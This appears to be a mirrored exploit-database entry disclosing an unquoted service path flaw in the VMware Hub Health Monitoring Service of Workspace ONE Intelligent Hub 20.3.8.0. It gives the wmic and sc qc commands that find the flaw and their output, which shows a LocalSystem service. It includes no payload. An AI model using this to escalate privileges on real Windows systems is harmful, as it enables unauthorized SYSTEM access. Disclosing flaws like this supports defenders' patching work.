Workspace one intelligent hub 20.3.8.0 vmware hub health monitoring service unquoted service path Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2021-06-17 | Type : local | Platform : windows
This exploit / vulnerability Workspace one intelligent hub 20.3.8.0 vmware hub health monitoring service unquoted service path is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

# Exploit Title: Workspace ONE Intelligent Hub 20.3.8.0 - 'VMware Hub Health Monitoring Service' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 06-16-2021
# Vendor Homepage: https://www.vmware.com/mx/products/workspace-one/intelligent-hub.html
# Software Links : https://getwsone.com/
# Tested Version: 20.3.8.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 Enterprise 64 bits


# Step to discover Unquoted Service Path:

C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
VMware Hub Health Monitoring Service VMware Hub Health Monitoring Service C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe Auto

C:\>sc qc "VMware Hub Health Monitoring Service"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: VMware Hub Health Monitoring Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Airwatch\HealthMonitoring\Service\VMwareHubHealthMonitoring.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : VMware Hub Health Monitoring Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem